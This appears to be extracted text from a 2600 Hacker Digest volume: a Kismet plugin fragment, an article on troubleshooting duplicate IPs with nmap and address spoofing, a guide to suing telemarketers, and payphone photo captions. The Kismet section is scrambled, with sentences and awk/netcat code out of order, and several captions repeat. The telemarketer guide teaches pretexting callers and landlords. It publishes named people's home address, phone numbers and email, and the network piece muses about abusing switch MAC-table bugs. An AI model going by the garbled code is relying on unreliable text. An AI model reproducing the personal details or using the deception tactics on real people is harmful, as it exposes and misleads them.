. Internally. ➥ chval[CHN]=$3. Kismet writes data files at regular intervals. the Kismet2009-05-RC release incorporates a complete rewrite of the Kismet engine and user interface. The first third-party plugin comes from http://www. adding new commands and reports to the client-server protocol. Netcat and (once again) Awk come to the rescue here:
echo -e ‘\n!0 enable channel ➥ channel. and enter the WEP key into the decryption system so all future packets from the network are decrypted automatically. reading data from DECT digital phone cards and expanding Kismet sniffing beyond 802. x < CHN. and hopefully others will start writing plugins (read as: that’s a hint) to add new features and functionality. Bigger changes lie under the hood. IDS alerts. as in multiple years longer) than intended. Despite taking longer (much longer. and any other data collected by Kismet. the new user interface is widget-based and dynamically reconfigurable. IDS alerts. but reading them while Kismet is running can cause problems. /CHANNEL:/ { chnum[CHN]=$2. without ever injecting any packets.VOLUME 26
analyzer software. do echo ➥ “$line” > channel. I curse all the time).\”value\”:%s}”. however. CHN=CHN+1. ➥ }. can export packets real-time to any other pcap based tool via tun/ tap virtual network interfaces. Plugins can also be attached to the client. but what actual plugins are there? So far. can have new dynamic sources added while it is running. I like curses. number of networks per channel) into a JSON file for displaying channel usage in AJAX. once read by a packet source. fflush(“”). automatically add the discovered WEP key to the log files for future reference. }.’ | while read line. Kismet will now automatically detect the driver type of network interfaces.json. including new custom data to be interpreted by later stages. and even change the main window layout. tracked networks and clients) and can attach any information. ➥ chnum[x]. Among other key new features. Fortunately. with a completely redesigned packet processing system with usability and expandability as the main goals. decryption. chval[x]). ➥ for (x = 0. and can add new windows and widgets. Similar magic can be done to extract active networks in the vicinity.detected.”) } ➥ printf(“]\n”). CHN=0. as several people are all too happy to remind me.

168. functional testing.0.100-110 | | 192. This article details the problem I created. I informed the users that I was not sure what was wrong and would get back to them when I had solved the problem.10 | | Secondary: 192. although I have a few guesses as to why. My project was simple: install and configure one GNU/Linux server with a collection of
Using Network Recon to Solve a Problem
by Aesun
shared IP addresses for an application. I managed to create my own networking problem out of sheer stupidity (which is how I usually manage to create technical problems for myself).namely myself.1 | ---------------------------------------------| | ------------------------.VOLUME 26
Disclaimer: I am not a computer networking expert. well. lo and behold. it would even detect when the primary server came back online and drop the shared IP addresses.-------------------------| Primary: 192. The IP addresses were being used for a software system that was not online yet. the applica-
80
. while it was failing for some of the addresses and not others.168. I didn’t really think it would matter. no foul. I ran the application and noticed that. of course. Since they were not being tested at the time. and.100-110 | ------------------------. the systems did need to be functional for. I began ping tests and all of the addresses were answering. The host names and internet protocol (IP) addresses have been changed to protect the (more or less) innocent .-------------------------| | | | | Shared Range: | | Shared Range: | | 192. this symptom was indicative of a much larger problem. The script worked perfectly during tests.168.168. During testing I came across a problem: when the secondary server came online. once the first server was set up and functional. To illustrate the configuration here is an example:
---------------------------------| Everything Else | ---------------------------------| ---------------------------------------------| GSS/CSS Device 192. I got a call.0.11| ------------------------. I accidentally left two Linux systems configured with identical shared IP addresses on the same virtual local area network (VLAN). build. The application was working with some of the IP addresses but not others. I left the problem to work on a production issue and accidentally left the shared IP addresses on both systems.-------------------------A few days went by as other projects took priority.1 and 192. Then.0. the addresses appeared to be okay but the application could not find the new location. I also want to note that I have no idea how this worked.168. Little did I know. install and configure a warm backup GNU/Linux system which would fire up the shared IP addresses if the primary server went offline. all addresses were available. only that it did work. Suddenly.THE HACKER DIGEST .168.0.1. I deal with networks day in and day out from a UNIX administrator’s perspective and have maintained simple networks. Regardless. Recently. the possible repercussions of what I discovered. I logged into the secondary system and fired up the application server. The users testing the new system didn’t do any testing for a while and then. no harm. After troubleshooting for a few hours. the rather strange way I fixed it.0.

yet some of the IP addresses still would not work with the primary server. Using nmap. I discovered that some packets were landing on the primary server. It was at this point I realized the problem was not with the hosts or any clients. was to clear the arp cache on both servers. 2. Again. they still could do things incredibly stupid. I didn’t have time to track down the overworked network administrator. I then remembered that. fired up a tcpdump session targeting the application port on each one. packets were split and landing on the same systems they had before. I deduced (correctly) that the device was either a global or content switch. if the hardware address changed then the switch would simply update the tables and move on. I have not had a chance to try any experiments. but when I did a domain lookup on the device it had addresses on two different networks. Under normal circumstances. What quick and easy tool might I have made sure was installed on a system with heavy network use in an network environment I was unfamiliar with? Nmap. I now had a working theory as to what was wrong: the switch had the wrong hardware address in its tables for the IP address. one network was the same one that the servers were on while the other was a locally managed network. of course. but how to fix it? It was a tough problem because the main IP address was. Tools such as packet sniffers and aggressive scanners do have their place in the troubleshooting realm. and started pinging the IP addresses and port that the application was using from a third system.THE HACKER DIGEST . voila. of course. Thanks for reading and keep hacking.
81
. I logged in to both servers using secure shell and fired up tcpdump but filtered out secure shell traffic.. while others were landing on the secondary server. that had not happened in the case of this particular device. While I thought the findings were interesting.VOLUME 26
tion started working. I also noted the replies from the servers were going to the same device. The easiest cure.. The secondary server’s shared IP addresses were offline. I logged into both servers using secure shel. when aggressive network traffic fires from a particular host into (or across) a switch or router it causes the switch or router to go through a quick check of what it knows about the device talking to it. to date. I then resorted to a tactic I never like to do – I rebooted both servers. in this instance I actually used them to fix a problem. using a tool that could change a hardware address on an interface and another tool that could spoof an address. he agreed that not only was IP/MAC spoofing a possible issue but arp spoofing as well. I fired off a fingerprinting scan from the primary server and spoofed the address using the shared IP address instead of defaulting to the actual interface address and. For some reason. Still no dice. I did a little research and found a rather long document detailing bugs in GSS switches particular to MAC addresses and the CSM software. Even though network systems have improved greatly over the last several decades. Although I had used both of them for diagnostic purposes before. often. even though he had never used GSS and/ or CSS. ? Unfortunately. Note that the incorrect path to the secondary server was stuck for well over an hour after rebooting. I did hit up a friend of mine who is a Cisco specialist and. It was definitely a network issue. I recalled from my addled brain that switches often maintain a table of IP address to hardware address mappings. My first instinct was address resolution protocol (arp) cache. I restarted my packet sniffers in full verbose mode and noted that the packets going to the secondary server also had its machine address (MAC) in the packet data. The nature of what happened is telling with regard to Cisco’s Content Switch Management (CSM) software. There were several bugs that could have been related to the behavior I had witnessed. No dice. problem solved. it was time to start researching the problem to see what was happening. This is when the trouble started. in fact. so I began to think up of ways to solve the problem on my own. one persistently hit a GSS or CSS device . I had seen in the past where a host arp cache could cause potential routing problems. different on both servers (which I think is part of why the problem existed in the first place). I needed more data. then what possibilities would it open up? What if. Once again. I realized my users needed their test systems back to get their work done and decided to knock the shared IP addresses offline on the secondary system. I was a little out of my territory as I had never been in a GSS and/or CSS switched environment. Which immediately made me wonder: If real dual IP addresses messed up the mappings. Once again. I knew what was wrong. It was at this point that I realized I had come across something odd and decided to start doing some network recon to see if my guess was right. I learned two invaluable lessons: 1.

Although it is highly likely that you will settle out of court. if you Google the number. recorded messages to a home or cell phone. I decided to retaliate in a way that would have some real teeth. and the information about the telemarketing outfit is no longer valid (they’re a fly-by-night operation). d) They called a number on the Do Not Call list. Be interested in what they’re selling. o r g / w i k i / ➥Social_engineering_(security)).gov and make certain that all of your phone numbers are on the Do Not Call list. It will involve some paperwork and out of pocket costs. sell them on the product. If it is not legal for you to do so (e. Why? If enough people sue (or make credible enough threats that they decide to settle).THE HACKER DIGEST . it’s just someone innocent whose number the telemarketers have spoofed. e) They failed to provide a written copy of their Do Not Call list maintenance policy. though. Ensure that you have evidence that you can legally show in court to a judge that is sufficient to demonstrate that a) calls were made to you
illegally and b) the party you’re suing is responsible for those calls. they need to actually talk to the 0. how to contact them.wikipedia. and save a copy (for bringing to court) of the email confirmation they send you. whether it was an automated call. (I haven’t had a car in two years.g. b) They don’t include the name of the calling party at the beginning of the message. Here’s how you can do it too. as well as actual negotiation with your adversary.com
I would like to share with you some information and suggestions about how you can cash in on the illegal actions of your telemarketers. you may need special equipment to do so. especially as I know that they are illegal. how they got your number.. If possible. What you do is simple: play dumb and play along. However. from your phone company) that support your own notes. lied to about the legality of their operations. primarily in the form of an automated telemarketing message saying that it was the 2nd (or 3rd. clear. Specifically what is illegal about these calls (see appendix below) is that: a) They’re automated. If any of that would dissuade you from proceeding. What you can do is called “social engineering” (h t t p : / / e n . you must act as if you are actually going to sue these people. but always final) notice that my car insurance was about to expire. they’ll hang up on you. If you try to ask them anything about their company. try to obtain third party records (e.) These started to annoy me. or how they even know that you have a car. Step 2a: Finding out who is calling you . and trustworthy.5% of people who respond. they will hang up on you immediately. You can exploit this single vulnerability. If it is legal in your state (http://en. but they will do it anyway.5%.g. I get around by Ninja. Rather than just yell at them or make useless complaints to the FCC. Be aware that 99% of the posters will not know any more than you. etc. Write down the time. In October ‘08. Make
Step 1: Keep a log
82
. up to ~$150. incidentally. their risk of having to pay out is low enough to be a viable part of their operating costs. the entire message you heard (if any). record all your calls with telemarketers. then they’ll go out of business and hopefully switch to doing something with a bit less scumbaggery. ➥org/wiki/Caller_ID_spoofing). w i k i p e d i a . make sure that one way or another you make as detailed and accurate a transcript as possible. Go to http://donotcall. ➥ wikipedia. I began receiving repeated calls from telemarketers.. it’s probably a lie (http://en. As is.initial information First off: whatever it says on your caller ID. whether the message mentioned the caller’s corporate name at the start.
How it started. less.
Step 0: Mindstate
You need to keep a log of every single time they call you.VOLUME 26
Suing Telemarketers for Fun and Profit
by Sai Emrys 2600@saizai.org/wiki/Telephone_ ➥recording_laws). you’ll likely find out a whole lot of information about them from others who have gotten the same call. don’t bother starting. This is worth doing. However. since these will be incoming calls. there are multiple companies involved (see Step 3). and get them to pay. Be prepared to be blown off. Be sure to click the link in their response email. caller ID number. If they get even a hint that you are not in that bottom 0. It needs to be convincing. specific. and whether it included their phone number or mailing address. To do so. Unless you’re very lucky. in a ‘two party consent’ state). c) They don’t include the phone number or address of the caller. more likely. Telemarketers are calling you for a reason: they want to sell you something. This is illegal. NOTE: The information below is actual information that I used to get an actual settlement check. Don’t bother them. I’m sure you can think of ways to do so that don’t involve having to mention in court that you recorded the call.

Google their addresses. Specifically.O. address.asp. for Orange County. but warrantyadminservices. and the names of the people using that FBN: Kamisha Daniel. and what their direct phone number is. See if you can find other businesses in the same building. switchboard. hosts contractpipeline. “consumerdirectwarranty. Some Googling reveals that to be the email of “Steve Kinyon.g. I found SafeData Management Services C2330112. this is http://kepler.5307229099 / P. CA. Enter all of those websites into http:// ➥whois.77.216 is a Plesk control panel.com.com. Be aware that you may need to try a few variants before you find the right ones. searching for “national dealers” or “%warranty%” [% is the MySQL wildcard] gave me NATIONAL DEALERS WARRANTY SERVICE. and address of one of the real people behind the scenes. They will give you a fake 800 number first. and try to make your requests for information seems as much as possible a natural part of *their* script. C2900323. their legal address for service of process. to spider through the results: 1. for me. interested. 2305 Court St. because you’re really interested but just need to think it over / ask your spouse / etc and would really like to finish the deal once you get their approval. 25910 Acero. Martinee Jackson. That’s not enough to sue someone. you’ll just have found their CEO. E.THE HACKER DIGEST . and whatever else you need.g. Insignia Software Design. CA 96001 / 530-243-4958”. Call up those businesses and (very.” 4. 6. and are necessary if you want to sue the business. insigniasd.g. what you need are the formal business name of the people who called you.net and record all contacts that are for real people. 7. http://204. President/ CEO.com/fbn/index.com. and warrantyadminservices. do not ask anything implying that you know what they’re doing is illegal (until the very end when the game is up and you might as well get them on a couple more violations). website. and “949-309-3751 / 3753” (the telemarketers’ actual phone number).9. Inc. If you know what county they live or operate in. but it’s enough to get enough. Warranty Administration Services C3060269. showing the admin’s email as srkinyon@yahoo. I had four leads leaving the call: “Consumer Direct.com for any phone numbers or corporate names you have found. address.g.com gives the home phone and address of a couple Sletners living in Redding. 5. CA 92691. Manufacturer’s Direct Warranty Services C3060709. E. Redding.g. E. you want to make sure you record the agent for service of process. E. say that you need to have trust. and Global Service Partners LLC. They will lie to you. Orange County”. etc. You will need to do multiple passes as you get more information. and DIRECT phone number. Ask if there’s some direct line where you could call them back after you’ve thought about it. Specifically. If you’re lucky. Step 2b: Turning initial information into extensive information What you should have now is a name. Mario Moreno. do a Fictitious Business Name (FBN) search. very politely) ask for the landlord’s information (name and phone number). These public records all contain names and addresses. Call the landlord and ask who the tenant of suite X is.com showed that the same IP. United Fidelity Funding Corp.ocgov. Do not be angry with them. business name.-) Now you need to turn that into actionable information.” They will make up “discounts” they’re giving you. license number. Most will be irrelevant (it’s probably a cheap shared host).VOLUME 26
up a name. “877-539-8557” (can’t be reached). and phone numbers. ➥ca. This should get you phone.g. see if they answer). and real phone number (call it back.com/ and look up websites they mentioned. names. They will try to avoid this. a search for consumerdirectwarranty. Look up any corporate names at your Secretary of State website. name. Write it down. . They will transfer you several times while they “verify” things and “contact their agent.com). Redding. but you must play along. Mission Viejo. Check to see if there’s a different response with interesting information if you go to the base IP address. E. E. CA 96099” and website guy: “Insignia Web” (note the resemblance to insigniasd. 530-243-328. car.9. this will get you the real contact info for both their tech guy and their CEO. thatkitchenplaceredding.com”. this is http:// ➥cr.g. A couple calls later to eliminate random cousins yields the answer: “15676 Old Stage Coach Rd. Go to http://onsamehost. 204.com.g.sos. Your goal is to get them to tell you a website. Box 992050 / Redding. 2. and (if possible) their direct phone number.216. I found out that their landlord is Dolphin
83
.. and Insignia Software Designs C2571273. phone number. Try to make it sound natural.77.com.com) / +1. say that you need to close the deal now.com gave me the CEO: “Jim Sletner (info@ safedatainc. It is all complete bullshit.gov/. Search Google and http://switch ➥board. If you’re lucky. These steps are only partially in order. E. Act hooked. E. ask you to say that you decline it and that they won’t be able to offer it again. In CA. there was no useful WHOIS information for consumerdirectwarranty.com. so that you can repeat it if they ask again. Suite 200. that is the person to whom you will send legal papers (including your “pay me or I sue” letter).. and just wanting to get back in touch with them. 3.

THE HACKER DIGEST . 949-309-3750 is answered as “United Fidelity Funding Corporation.” It’s not a real company per se (though it’s listed as one). it can be written off as the cost of business. They do not place any calls directly.gov/ ➥forms/fillable/sc100. this would add up.ca. and most people don’t. Call the phone numbers a few times. 8. from there I was able to find out the actual address of the telemarketing outfit. It also helps you because you may make some contacts with people who know more about them and can offer advice that will be helpful to your case Step 3: Understand the structure It took a while for me to uncover enough information to do this. Find out their phone service provider. this was “SafeData Management Services. which is the “principal” (see appendix. 1. Inc.) 10. both are liable to you. “principle of agency”). They really really don’t like it when you do this. it’s more like one of several faces of the real company. they will probably be on a multi-line system and own many sequential numbers. This can make for great fun. detailed log of every call they made to you. whose name the telemarketers cite and claim to be. their contact information). and they own numbers up through at least 3780. as far as they’re concerned. you would be routed directly to their call center. The parent company will probably be perfectly happy to drop the telemarketers just as soon as they appear to be a liability. They are in business because very few people successfully find out who they are. this was “National Dealers Warranty Service” (not Inc. and a good way to practice your modifications of their script. Typically. Product shell companies In my case. The direct line for Kamisha Daniel. (See Step 3 below first. At a cost of $2500-$7500+ per suit in small claims (plus their legal fees). go get form SC-100 (http://www. they’ll claim that they’re not liable. which means they’re also a much better target for prosecution–but also one that’s a bit more able to defend themselves. Inc.
Step 4: Profit
84
.
Now that you’ve done your homework. review it and make sure it’s in order. the telemarketers are the “agent” of the parent company. see below. one of the co-owners.”) They are the ones whose name is going to be on actual product contracts. 3) The will to follow through with this despite a bit of runaround. Blog about it.g.” Discovering the name “National Dealers Warranty Service” (the true company name of the actual telemarketers. In legal terms.VOLUME 26
Partners and the cellphone number of one of the partners.g. If it’s a small number. rather than the warranty sellers) was the decisive point in my case. E.” They are too big an operation to easily just dissolve and reform every few months. and their agent for service of process. (The Nevada face is “Warranty Administration Services. only the telemarketers are. Because of this. and it makes them look bad. Why? Because it allows other people.) 3. This plus the FBN search gave me all the information I needed to make a very credible legal threat against both of them. Get papers ready If you’re filing in CA civil court. like you. etc. 2. to find out who they are and sue them.. if you try to sue them. you may be getting calls from many different telemarketers on behalf of the same people. 2) The full formal name of the company. this was “Consumer Direct Warranty Services. You’ll need this later for subpoenas. Inc.” Several of the reps from 949-309-3751 onwards answer as “National Dealers Warranty Service” or “Warranty Services. is 949-309-3773. Their main number is 949-309-3750. their address. and starting over again if they do–than actually being able to win any cases that are brought to court. and what about that call was illegal (see the list at the top). telemarketers are a replaceable commodity. Specifically. however. and you can sue and collect from either or both–but they will try to tell you otherwise. with more or less the same script. the telemarketers are not very legally savvy. they just handle the product being sold by the telemarketers. and fewer still actually go through to the point of suing or settling. This is the person to call if you have a lawsuit ready to go and you want to settle. They do not.courtinfo. their phone number(s). and rely more on not getting caught–and dissolving. These companies constantly change. you’ll need: 1) A full.) If you dial 949-309-3750 extension 0. Actual telemarketers In my case. It’s very straightforward. Include all the details (e.: Direct number I got was 949-309-3751 / 3753. Then ask them to check whether they are the provider for the phone numbers you know to be used by the telemarketers. 9. as if they had called you. Try numbers that are a few off higher and lower than then number you got. just an FBN). so it can be confusing. moving. reading this article. There are at least three layers of companies involved in this operation: 1. (See appendix for info. Call up a few providers that operate in the area and ask for their legal compliance center’s phone number. so you don’t have to wait for them to call you. make any calls to you directly.pdf) and fill it out. Try it both during their hours of operation (so you get a live operator) and after (so you get their voicemail messages). They can’t tell the difference. (This is false. Parent product company In my case.

Offer to settle Under CA law. If you’d like to know more about my cases. What this means is that you call their CEO and say (from a prepared statement) that you are about to sue them for violation of the TCPA. 3 business days). Happy hunting! Google and Wikipedia are your friends.g. I went through this process with NDWS as well. for small claims at least. or your case may get thrown out. My court claim was for $7500. someone who used Google and my brain to resolve a matter like this to my satisfaction. If it does. you will treat their response as a refusal to settle and proceed with the lawsuit. It’ll cost $70-150. or others might have that will help you prove your case. 2.THE HACKER DIGEST . In CA. However. specified period of time (e. make sure they’re entered correctly. On receiving the notarized settlement from SafeData and cashing their cashier’s check.from a different telemarketer. because they are only an FBN and not a corporation. I recommend that you refer to the excellent Nolo Press book. however. This involves lawyers and higher court costs (filing fees alone are $200-300).only for outgoing calls and calls made to cellphones. their phone company. call again saying that unless they call you back within a reasonable. it has a lot of useful information about the process and requirements. however. I can sue (and collect against) them as individuals. but with the same parent company behind it. however. 3. you should find out whether your state has laws similar to the CA CLRA (see below). check out http://saizai. according to my phone service provider.gov/selfhelp/smallclaims/). you will need to go to full-scale civil court. it may take a few hours. Think of all the documents that the telemarketers. it may be that their story changes when given an actual subpoena. Then hire a process server near your adversary to serve the filed court order on them. and b) they wanted to include a gag clause to prevent me from discussing it. ➥com/tag/tcpa or email me. and CA CLRA (or insert applicable laws here. Unfortunately.ca. one day after I settled with SafeData. injunctions are provided for as one of your recourses under the TCPA and CLRA. To obtain one (and thus put them out of business or face arrest). deciding on the final value and terms is just like bartering for a car. and I’m definitely not your lawyer. and would like to know whether they are interested in settling the matter out of court to avoid the hassle and expense of court.livejournal. You’ll probably need to leave a callback number while the secretary you tell this to calls the CEO and their lawyer. I eventually settled with SafeData for half that amount. TSR.VOLUME 26
You may want to prepare subpoenas also. “severally and collectively”. I’ve only discussed the procedure for financial recourse. I’d only be able to sue the corporation. be sure to give plenty of time for this. If you don’t live in CA. we’ll see how that turns out. One advantage in this case is that.
Step 5: Taking it even further
Appendix: Know Thy Law
85
. with the caveat that I had to take down my blogged information about them. You should do your own research also. Please note that I am not a lawyer. Everybody’s Guide to Small Claims Court. If they don’t get back to you within a few days. Small claims courts do not have jurisdiction to issue injunctions. give the clerk your documents. At that point. I also highly recommend that you read through the California Courts Self-Help Center (http://www. File suit Most likely. you will want to include them in your calculation of damages and in your demand letter. I’m continuing my suit in court. but a) they flaked out when I insisted that they have their contract notarized. if they had incorporated. your phone company. As a result. Ironically. depending on how hard they are to reach. Be sure you get a signed “proof of service” back from the process server and file it with the court. and that I can continue my suit for the rest of it against National Dealers Warranty Service. lawyer’s fees are recoverable as part of your damages. they do not keep subpoenable records of call detail records (CDR). they’ll brush you off the first time. which at this point would probably not have any assets to collect. A substantial portion of it is available through Google Books search. Their initial settlement offer was $1500. I got another call with the same pitch . I am. I haven’t tested this yet. for incoming calls to landlines . see below). using this as a starting point. preventing me from suing them again for the same charges (but see below). including automatic number identification (ANI) and originating private branch exchange (PBX). This means that a) I immediately get to put my blog posts back up (because they are now based on the new incident) and b) I will be suing them in superior civil court for an injunction and significantly higher costs. and this information was critical to that. we wander out of the territory that I can cover in this article and that is easy to do on your own. I hired a lawyer for this case. on contingency. You’ll have to go to court. really. I filed a dismissal with prejudice with the court. AT&T’s legal compliance division. etc. you are required to contact the people you are about to sue to first try to settle the matter in good faith. They’ll be much more eager to settle once you’ve had them served with your court order.courtinfo. under California law at least.

F.R. However. $2500 afterwards. the normal. Also. per plaintiff. I. 299 (1932) Therefore the total amount *per call* under TCPA alone is $500-1500. and at some point give their phone or address Private right of action 47 U.VOLUME 26
Principal of Agency See The Elements of Business Law by Ernest Wilson Huffcut. § 227(b)(1)(A)(iii) . or c) Get them to settle for a reasonable amount by credibly threatening to do a) and/or b) Telco subpoena resources AT&T landlines: 800 291 4952 x9 AT&T wireless: 800 635 6840 Alltel / Windstream landline: 888 558 6700 x1 Alltel wireless: 866 820 0430 Versign / Focal Comm.C.making automated calls to residential line w/out prior express consent 47 U.unsolicited prerecorded message without real human first giving caller name & address or phone number CA Civil Code §1780 (a) .
86
.S.. 2000. § 227(b)(3) . “Liability of principal to third party” for details.S. Malone Note: 1 call = up to 1 violation of TCPA .S.C. injunction.court may increase fine to up to $1500 per violation if it finds the defendant ‘willfully and knowingly violated this section’ (easily established by sending them a C&D letter by certified mail) 47 U.C. footnote 24 for official policy.S.state AG may sue in federal district civil courts Statute of limitations: 4 years per 28 U.same as (b)(3)(A&B) above including tripling clause. as well as 3. § 227(c)(5) . and thus a single call to you may constitute two violations . whichever is greater 47 U. You can collect judgment against both. how to word the subpoena. not twice as much.all recorded messages must state identity of caller at beginning of message 47 U. Be sure to ask what records they can provide. so it won’t hurt you to try to claim one violation per infringing section (-4 per call) and see how your local court interprets it.C.THE HACKER DIGEST . and one under (c)(3). Make a convincing case that the opposing party is scum who are knowingly and flagrantly calling tens of thousands of people illegally and flouting the law.R.ditto.one under (b)(1). § 227(f)(1&2) . but you only get to have the single amount. 12391. to recover actual monetary loss or $500 in damages for each violation. punitive damages.C.making a ‘telephone solicitation’ to anyone on the Do Not Call list 47 U. §126. they are both responsible for paying you off.. & whatever else the court thinks is appropriate CA Civil Code §1780 (d) .43 unsolicited faxes ($1500/fax if from outside CA.. at $500-$1500 per violation Public right of action 47 U.e. etc.S. then you should either: a) Sue separately for separate incidents b) Sue in superior civil court (i. Section 1658. how much it’ll cost. § 227(d)(A)(2) . 12397 (1995) and FCC 00-378.S. if received more than one call in any 12 month period on behalf of the same entity. Telephone Consumer Protection Act (TCPA) 47 U. the Blockburger interpretation is not held everywhere. § 64. then that is a matter for the two of them to resolve between themselves using a suit for indemnification.C. It is purely at the judge’s discretion.sue for actual damages.e. § 227(b)(1)(B) . and not your problem. 10 F.C. See also FTC v.1601 (4)(e) .S. October 23.making automated calls to cellular phones 47 U. $3000/fax if from inside) Note: CA Civil Code §1780 (a) means that you get to sue for any amount up to the cap of the type of court you filed in. non-small-claims variant). § 227(b)(3)(A) . but you can only collect once.Blockburger v. must be a number to which one can make a do not call request. Note that (c)(5) is a separate action. § 227(d)(A)(1) .sue in state court for injunction 47 U.C.. United States. whom to address it to. must not block caller ID. CA Small Claims Court limitations CA small claims court limits for claims are $7500 twice a year.S. Federal Trade Commission’s Telemarketing Sales Rule (TSR) 47 C. it doesn’t include damages under the TSR or CLRA. restitution. “Could you please check whether you’re the right people to subpoena for this number?” will often give you an answer like “No.C.C.winner gets attorney fees & court costs CA Civil Code of Procedure §1021.g.S. E.C. If the agent is behaving in a way that violates their contract with the principal. and that will be a high amount. 284 U.: 312 895 8978 Many of these will tell you the service provider of a number if you ask nicely. see Sznyter v.C.S. that is only for the TCPA violation. Venkataraman (FTC won by settlement) CA Consumers Legal Remedies Act CA Civil Code §1770 (a)(22)(A) . § 227(c)(3)(F) .telemarketers must transmit caller ID (CPN or ANI) & name of telemarketer or their client. § 227(b)(3)(B) . / Level 3: 918 547 9618 Socal Comm.5 – ditto CA Business & Professions Code §17200 injunctions Statute of Limitations: 1 yr CA Business & Professions Code §17538.S. and then you know whom to call next.C.S. that’s Focal-Verisign:7058”. The principal is legally liable for the actions of their agent. What it means: you can sue both the telemarketers (who are acting as the agent de facto of the warranty sellers) and the warranty sellers themselves (who are called the principal). If you want to sue for more than that.

these phones seem to be the prevailing model throughout the city and possibly the entire country.v
Eastern European Payphones
Serbia. Photo by Stevan Radanovic
. Found in Belgrade.

Found in Belgrade. Photo by Stevan Radanovic
. these phones seem to be the prevailing model throughout the city and possibly the entire country.v
Eastern European Payphones
Serbia.

See if you can figure out which is which. The older one was actually attached to the former KGB building. Photo by Alex Kudelin
. Both of these phones were seen in the city of Cherkasy.v
Eastern European Payphones
Ukraine. One is a newer model while the other is a slight bit older. Both are operated by Ukrtelecom.

v
Eastern European Payphones
Ukraine. See if you can figure out which is which. Both are operated by Ukrtelecom. Both of these phones were seen in the city of Cherkasy. One is a newer model while the other is a slight bit older. The older one was actually attached to the former KGB building. Photo by Alex Kudelin
.

the company best known for inventing the pink handset.v
Foreign Payphones
Hungary. this phone is operated by T-Com. Seen in Szolnok in a quaint but graffiti ridden booth. a fully consolidated subsidiary of German phone giant Deutsche Telekom. Photo by Rob Craig
.

the company best known for inventing the pink handset. a fully consolidated subsidiary of German phone giant Deutsche Telekom. Photo by Rob Craig
.v
Foreign Payphones
Hungary. Seen in Szolnok in a quaint but graffiti ridden booth. this phone is operated by T-Com.

these are two distinct types of payphones that have each been around for a while. Seen in the state of Johor in West Malaysia. Photo by Jayakanthan Lachmanan
. The first can be found in restaurants and other establishments while the second is more likely to be seen outdoors or in an unsecured environment.v
Foreign Payphones
Malaysia.

The first can be found in restaurants and other establishments while the second is more likely to be seen outdoors or in an unsecured environment.v
Foreign Payphones
Malaysia. these are two distinct types of payphones that have each been around for a while. Photo by Jayakanthan Lachmanan
. Seen in the state of Johor in West Malaysia.

Photo by Ben Sampson
.v
Payphones of the Old World
Egypt. This phone box was located on the bank of the River Nile. just outside the Temple of Kom Ombo.

v
Payphones of the Old World
Egypt. This one was found in Luxor. Photo by troglow
. Another common type of phone that can be seen throughout the country.

sherman
.v
Payphones of the Old World
Ukraine. Seen in Lviv. Photo by c. This phone has obviously seen it all and still has managed to retain a sense of fashion.

Photo by Da Beave
. From this phone you are eye level with the 140 statues of saints. this may very well be the only payphone in existence there. It can be found at St. Peter’s Basilica on the “roof” overlooking Piazza San Pietro. Technically a country right in the middle of Rome.v
Payphones of the Old World
Vatican City.

the national telecommunications operator. Found at the Torarica Hotel in Paramaribo. Photo by TProphet
.v
More Foreign Payphones
Suriname. this payphone lacks an enclosure but has a sticker with the website for Telesur.

A stylish and very busy phone. Photo by LART
.Kyushu. which was seen near the grounds of Kumamoto Castle on the island of .v
More Foreign Payphones
Japan.

a historical park in Alberta.v
More Foreign Payphones
Canada. Photo by Carsen Q. Found in Fort Edmonton Park. It’s amazing what you can do to an ordinary payphone with a little imagination and rustic charm.
.

Photo by TProphet
. Found at the waterfront in Cape Town. this Telkom payphone takes both coins and cards.v
More Foreign Payphones
South Africa.

v
Payphones in Exotic Places
Guatemala. One of the typical phones found throughout the country. Photo by Gary Davenport
.

v
Payphones in Exotic Places
Burkina Faso. Note the symbol for international calling: one flag connecting to another. This rather dusty phone was found in the city of Ouagadougou. Photo by M J
.

) Photo by Jeffrey Mann
. (It didn’t work. Seen in the departures area of the Kigali Airport.v
Payphones in Exotic Places
Rwanda. incidentally.

This brightly colored model that takes both coins and cards was discovered beside the Pereybere Beach in Pereybere. Photo by Scott Brown
.v
Payphones in Exotic Places
Mauritius.

In France. Photo by Mike Miller
. In fact. the law states that every city. this phone can only make emergency calls or calls using credit or calling cards.v
Unusual Looking Payphones
France. town. or village must have at least one payphone. The unusual thing about this phone found in the countryside is the fact that it takes neither coins nor cards.

found in a park in Ueno. Etheredge II
.v
Unusual Looking Payphones
Japan. Tokyo. Photo by Jim E. They don’t really get much pinker than this model.

Photo by professor ned
. or perhaps it was just a hallucination.v
Unusual Looking Payphones
Thailand. Seen in a place called Chiang Mai.

v
Unusual Looking Payphones
Russia. These people must really appreciate telephony. This was actually the grand opening of a payphone in Kamchatka Oblast. Photo by Curtis Vaughan
. We can’t even imagine one of our phones being celebrated so festively.

South Carolina outside a gas station on the highway 23/74 bypass. Found in Franklin.v
Unusual Payphones
In the United States. Photo by Sam T. Hoover
. you might say payphones are a dying breed.

Photo by romano. It’s not going anywhere.v
Unusual Payphones
Quite the opposite holds true in Kyrgyzstan. These models have existed for ages in the old Soviet Union. found in Bishkek. This one has been converted to touch tone from rotary dial and it’s also been freshly painted.tamo
.

v

Unusual Payphones

We never tire of these weird little payphones found all over Japan. One has to wonder what’s really going on in all that space under the hood. It being pink and rotary is just an added bonus. Found in the lobby of a hotel in rural Suzuka. Photo by Darren Stone

v

Unusual Payphones

And we’re back in the United States again where (did we mention?) payphones are a dying breed. And in a variety of styles. Found in Newport Beach, California. Photo by Matt Figroid

v

Unusual Phone Booths

One of these phones is not like the other. These booths were found outside the phone company building in Grand Turk, part of the Turks and Caicos Islands. The phone company, incidentally, is known as LIME (Landline, Internet, Mobile, Entertainment). Photo by Dieselpwner

v

Unusual Phone Booths

This is about as grandiose as it gets. This booth, found in Arrowtown, New Zealand, is closer to the size of an apartment than a phone booth in many parts of the world. Photo by Michael Hall

v

Unusual Phone Booths

This one is just unusual on a variety of levels. The colorful booth, the bright blue phone, the old street scene, even that strange word that means telephone. This is, of course, in Lithuania, in the old town district of Vilnius. Photo by Elvis

They were seen outside a ShopRite in a neighborhood with no obvious Asian connection. as is evidenced by these ones found in West Caldwell. payphones are going through a confusing period. New Jersey. Why they are Chinese-themed is anyone’s guess. Photo by Conor Laverty
.v
Unusual Phone Booths
In the United States.

